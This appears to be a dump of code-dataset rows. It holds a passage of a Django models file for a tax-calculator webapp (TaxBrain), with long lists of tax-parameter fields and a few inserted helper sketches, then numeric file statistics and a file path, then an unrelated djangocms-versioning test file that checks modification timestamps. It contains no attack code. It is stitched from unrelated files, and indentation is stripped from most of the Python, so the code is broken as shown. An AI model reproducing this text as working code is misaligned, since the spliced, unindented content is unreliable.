II_rt6 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt7 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt8 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_prt = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for the AMT.
AMT_em_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_prt = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_Child_em_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_Child_em_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_Child_em_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_Child_em_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_Child_em_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_KT_c_Age = CommaSeparatedField(default=None, blank=True, null=True)
AMT_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_thd_MarriedS_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_thd_MarriedS_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_thd_MarriedS_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_em_pe_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_pe_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_pe_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
# Parameters used for Credits.
EITC_rt_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_rt_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_rt_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_rt_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_prt_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_prt_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_prt_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_prt_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_MinEligAge = CommaSeparatedField(default=None, blank=True, null=True)
EITC_MinEligAge_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_MaxEligAge = CommaSeparatedField(default=None, blank=True, null=True)
EITC_MaxEligAge_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_InvestIncome_c = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_indiv = CommaSeparatedField(default=None, blank=True, null=True)
CTC_c = CommaSeparatedField(default=None, blank=True, null=True)
CTC_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CTC_prt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CTC_additional = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_refund_limit_rt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_refund_limit_payroll_rt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_c_under5_bonus = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_rt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CTC_new_prt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_c = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_c_under5_bonus = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_for_all = models.CharField(default="False", blank=True, null=True, max_length=50)
DependentCredit_before_CTC = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_rt = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_ChildNum = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_rt_bonus_under5family = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_Income_thd = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_Income_thd_cpi = models.NullBooleanField(default=None, blank=True, null=True)
DependentCredit_c = CommaSeparatedField(default=None, blank=True, null=True)
LLC_Expense_c = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Single_0 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Single_1 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Single_2 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Single_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ETC_pe_Married_0 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Married_1 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Married_2 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Married_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Child and dependent care phaseout
CDCC_c = CommaSeparatedField(default=None, blank=True, null=True)
CDCC_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CDCC_ps = CommaSeparatedField(default=None, blank=True, null=True)
CDCC_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CDCC_crt = CommaSeparatedField(default=None, blank=True, null=True)
CDCC_crt_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Pass through tax parameters
PT_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt5 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt6 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt7 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt8 = CommaSeparatedField(default=None, blank=True, null=True)
PT_EligibleRate_active = CommaSeparatedField(default=None, blank=True, null=True)
PT_EligibleRate_passive = CommaSeparatedField(default=None, blank=True, null=True)
PT_wages_active_income = models.CharField(default="False", blank=True, null=True, max_length=50)
PT_top_stacking = models.CharField(default="True", blank=True, null=True, max_length=50)
PT_exclusion_rt = CommaSeparatedField(default=None, blank=True, null=True)
PT_exclusion_wage_limit = CommaSeparatedField(default=None, blank=True, null=True)
PT_exclusion_wage_limit_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Fair Share Tax Parameters
FST_AGI_trt = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_0 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_1 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_2 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_3 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_4 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_cpi = models.NullBooleanField(default=None, blank=True, null=True)
FST_AGI_thd_hi_0 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_1 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_2 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_3 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_4 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AGI_surtax_thd_0 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_1 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_2 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_3 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_4 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AGI_surtax_trt = CommaSeparatedField(default=None, blank=True, null=True)
LST = CommaSeparatedField(default=None, blank=True, null=True)
CR_RetirementSavings_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_ForeignTax_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_ResidentialEnergy_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_GeneralBusiness_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_MinimumTax_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_AmOppRefundable_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_AmOppNonRefundable_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_SchR_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_OtherCredits_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_Education_hc = CommaSeparatedField(default=None, blank=True, null=True)
UBI_u18 = CommaSeparatedField(default=None, blank=True, null=True)
UBI_1820 = CommaSeparatedField(default=None, blank=True, null=True)
UBI_21 = CommaSeparatedField(default=None, blank=True, null=True)
UBI_ecrt = CommaSeparatedField(default=None, blank=True, null=True)
# Boolean Checkbox Fields
ALD_InvInc_ec_base_RyanBrady = models.CharField(default="False", blank=True, null=True, max_length=50)
NIIT_PT_taxed = models.CharField(default="False", blank=True, null=True, max_length=50)
CG_nodiff = models.CharField(default="False", blank=True, null=True, max_length=50)
EITC_indiv = models.CharField(default="False", blank=True, null=True, max_length=50)
CTC_new_refund_limited = models.CharField(default="False", blank=True, null=True, max_length=50)
CTC_new_refund_limited_all_payroll = models.CharField(default="False", blank=True, null=True, max_length=50)
II_no_em_nu18 = models.CharField(default="False", blank=True, null=True, max_length=50)
# Inflation adjustments
inflation = models.FloatField(default=None, blank=True, null=True,
validators=[MinValueValidator(0.000), MaxValueValidator(1.000)])
inflation_years = models.FloatField(default=None, blank=True, null=True,
validators=[MinValueValidator(0), MaxValueValidator(10)])
medical_inflation = models.FloatField(default=None, blank=True, null=True,
validators=[MinValueValidator(0.000), MaxValueValidator(1.000)])
medical_years = models.FloatField(default=None, blank=True, null=True,
validators=[MinValueValidator(0), MaxValueValidator(10)])
cpi_offset = CommaSeparatedField(default=None, blank=True, null=True)
# Growth Assumptions
factor_adjustment = CommaSeparatedField(default=None, blank=True, null=True)
factor_target = CommaSeparatedField(default=None, blank=True, null=True)
growth_choice = models.CharField(blank=True, default=None, null=True,
max_length=50)
# Job IDs when running a job
job_ids = SeparatedValuesField(blank=True, default=None, null=True)
jobs_not_ready = SeparatedValuesField(blank=True, default=None, null=True)
# Starting Year of the reform calculation
first_year = models.IntegerField(default=None, null=True)
# Record whether or not this was a quick calculation on a sample of data
quick_calc = models.BooleanField(default=False)
# generate fields from default param data
# this may eventually be useful if we can ensure that syncdb picks up
# field changes and automatically creates migrations
"""
for param in TAXCALC_DEFAULT_PARAMS.values():
for col_field in param.col_fields:
exec(col_field.id + \
" = CommaSeparatedField(default=None, null=True, blank=True)")
if param.inflatable:
exec(param.cpi_field.id + \
" = models.NullBooleanField(default=None, blank=True, null=True)")
"""
# Result
tax_result = JSONField(default=None, blank=True, null=True)
# raw GUI input
raw_input_fields = JSONField(default=None, blank=True, null=True)
# validated GUI input
input_fields = JSONField(default=None, blank=True, null=True)
# deprecated fields list
deprecated_fields = ArrayField(
models.CharField(max_length=100, blank=True),
blank=True,
null=True
)
# JSON input text
json_text = models.ForeignKey(JSONReformTaxCalculator, null=True, default=None, blank=True)
# Error text
error_text = models.ForeignKey(ErrorMessageTaxCalculator, null=True, default=None, blank=True)
# Creation DateTime
creation_date = models.DateTimeField(
default=make_aware(datetime.datetime(2015, 1, 1))
)
def get_tax_result(self):
"""
If the taxcalc version is 0.13.0 or later, return the table as-is.
If it is earlier than 0.13.0, rename its keys to the new names and
then return the table.
"""
return Resultable.get_tax_result(self, OutputUrl)
NONPARAM_FIELDS = set(["job_ids", "jobs_not_ready", "first_year", "quick_calc",
"tax_result", "raw_input_fields", "input_fields",
"json_text", "error_text", "creation_date", "id",
"data_source"])
def set_fields(self):
"""
Parse raw fields:
1. Keep only the fields that the user specifies
2. Map TaxBrain (TB) names to Tax-Calculator (TC) names
3. Do more specific type checking--in particular, check that each
field has the type that Tax-Calculator expects for that parameter
4. Remove errors on parameters that are not displayed
"""
Fieldable.set_fields(self, taxcalc.Policy,
nonparam_fields=self.NONPARAM_FIELDS)
def get_model_specs(self):
"""
Build JSON model specifications from the fields data.
returns: reform_dict, assumptions_dict, reform_text, assumptions_text,
errors_warnings
"""
(reform_dict, assumptions_dict, reform_text, assumptions_text,
errors_warnings) = param_formatters.get_reform_from_gui(
self.start_year,
taxbrain_fields=self.input_fields,
use_puf_not_cps=self.use_puf_not_cps
)
Fieldable.pop_extra_errors(self, errors_warnings)
return (reform_dict, assumptions_dict, reform_text, assumptions_text,
errors_warnings)
@property
def start_year(self):
# alias for first_year
return self.first_year
class Meta:
permissions = (
("view_inputs", "Allowed to view Taxbrain."),
)
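# Illustrative sketch, not part of the original module: how the webapp is
# expected to drive this model end to end -- store the raw GUI fields,
# normalize them with set_fields(), then build the Tax-Calculator
# specifications with get_model_specs(). "raw_fields" is a hypothetical dict
# of user input, and use_puf_not_cps is assumed to be an attribute set
# elsewhere on the model, as referenced in get_model_specs() above.
def build_taxcalc_specs(raw_fields, first_year, use_puf_not_cps=True):
    inputs = TaxSaveInputs(raw_input_fields=raw_fields,
                           first_year=first_year,
                           use_puf_not_cps=use_puf_not_cps)
    inputs.set_fields()  # parse raw fields into validated input_fields
    (reform_dict, assumptions_dict, reform_text, assumptions_text,
     errors_warnings) = inputs.get_model_specs()
    return reform_dict, assumptions_dict, errors_warnings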
class WorkerNodesCounter(models.Model):
'''
This model is a counter recording which set of worker nodes the most
recent TaxBrain job was deployed to. It is a singleton to enforce
round-robin behavior when multiple dynos run simultaneously: the
database is the single source of truth for which set of nodes
received the last dispatch.
'''
singleton_enforce = models.IntegerField(default=1, unique=True)
current_offset = models.IntegerField(default=0)
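# Illustrative sketch, not part of the original module: how the singleton
# counter above could drive round-robin dispatch. The real dispatch code lives
# elsewhere in the webapp; "num_node_sets" is a hypothetical parameter for the
# number of deployed worker-node sets.
def next_worker_node_offset(num_node_sets):
    # singleton_enforce=1 is unique, so at most one counter row can ever exist
    counter, _ = WorkerNodesCounter.objects.get_or_create(singleton_enforce=1)
    offset = counter.current_offset
    # advance the offset so the next job goes to the following node set
    counter.current_offset = (offset + 1) % num_node_sets
    counter.save()
    return offset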
class OutputUrl(models.Model):
"""
This model creates a unique URL for each calculation.
"""
unique_inputs = models.ForeignKey(TaxSaveInputs, default=None)
user = models.ForeignKey(User, null=True, default=None)
model_pk = models.IntegerField(default=None, null=True)
# Expected Completion DateTime
exp_comp_datetime = models.DateTimeField(
default=make_aware(datetime.datetime(2015, 1, 1))
)
uuid = models.UUIDField(default=uuid.uuid4, null=True, editable=False, max_length=32, blank=True, unique=True)
taxcalc_vers = models.CharField(blank=True, default=None, null=True,
max_length=50)
webapp_vers = models.CharField(blank=True, default=None, null=True,
max_length=50)
def get_absolute_url(self):
kwargs = {
'pk': self.pk
}
return reverse('output_detail', kwargs=kwargs)
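# Illustrative sketch, not part of the original module: persist a finished run
# and hand back its permanent URL. Assumes an existing TaxSaveInputs row and
# that an "output_detail" URL pattern is registered, as get_absolute_url()
# above expects; model_pk is assumed here to mirror the inputs row's pk.
def publish_result(inputs, user=None):
    url = OutputUrl.objects.create(unique_inputs=inputs,
                                   user=user,
                                   model_pk=inputs.pk)
    return url.get_absolute_url()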
| 63.032787
| 114
| 0.757533
| 7,193
| 53,830
| 5.463645
| 0.072014
| 0.131221
| 0.180941
| 0.23402
| 0.851679
| 0.851145
| 0.847837
| 0.839542
| 0.797176
| 0.535623
| 0
| 0.014753
| 0.139941
| 53,830
| 853
| 115
| 63.106682
| 0.834115
| 0.055285
| 0
| 0.071637
| 0
| 0
| 0.009175
| 0.000838
| 0
| 0
| 0
| 0
| 0.001462
| 1
| 0.019006
| false
| 0.001462
| 0.024854
| 0.002924
| 0.923977
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
7db26938d463bc057c6e3990f08559155c9e32be
| 9,473
|
py
|
Python
|
tests/test_handlers.py
|
chaosk/djangocms-versioning
|
257910183502536882df6e2459c5c6f325e6a584
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_handlers.py
|
chaosk/djangocms-versioning
|
257910183502536882df6e2459c5c6f325e6a584
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_handlers.py
|
chaosk/djangocms-versioning
|
257910183502536882df6e2459c5c6f325e6a584
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import datetime
from django.utils import timezone
from cms.api import add_plugin
from cms.models import Placeholder, UserSettings
from cms.test_utils.testcases import CMSTestCase
from freezegun import freeze_time
from djangocms_versioning.models import Version
from djangocms_versioning.test_utils import factories
class HandlersTestCase(CMSTestCase):
def test_modified_date(self):
pv = factories.PollVersionFactory()
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
pv.content.save()
pv = Version.objects.get(pk=pv.pk)
self.assertEqual(pv.modified, dt)
def test_add_plugin(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_add_plugin_uri(
placeholder=placeholder,
plugin_type="PollPlugin",
language=version.content.language,
)
data = {"poll": poll.pk}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_change_plugin(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_change_plugin_uri(plugin)
data = {"poll": poll.pk}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_clear_placeholder(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_clear_placeholder_url(placeholder)
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, {"test": 0})
self.assertEqual(response.status_code, 302)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_delete_plugin(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_delete_plugin_uri(plugin)
data = {"poll": poll.pk}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 302)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_add_plugins_from_placeholder(self):
version = factories.PageVersionFactory()
source_placeholder = factories.PlaceholderFactory(source=version.content)
target_placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
source_placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_copy_plugin_uri(plugin)
data = {
"source_language": version.content.language,
"source_placeholder_id": source_placeholder.pk,
"target_language": version.content.language,
"target_placeholder_id": target_placeholder.pk,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_paste_placeholder(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
user_settings = UserSettings.objects.create(
language=version.content.language,
user=self.get_superuser(),
clipboard=Placeholder.objects.create(slot="clipboard"),
)
placeholder_plugin = add_plugin(
user_settings.clipboard, "PlaceholderPlugin", version.content.language
)
plugin = add_plugin(
placeholder_plugin.placeholder_ref, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_move_plugin_uri(plugin)
data = {
"plugin_id": placeholder_plugin.pk,
"placeholder_id": placeholder.pk,
"target_language": version.content.language,
"move_a_copy": "true",
"target_position": 1,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
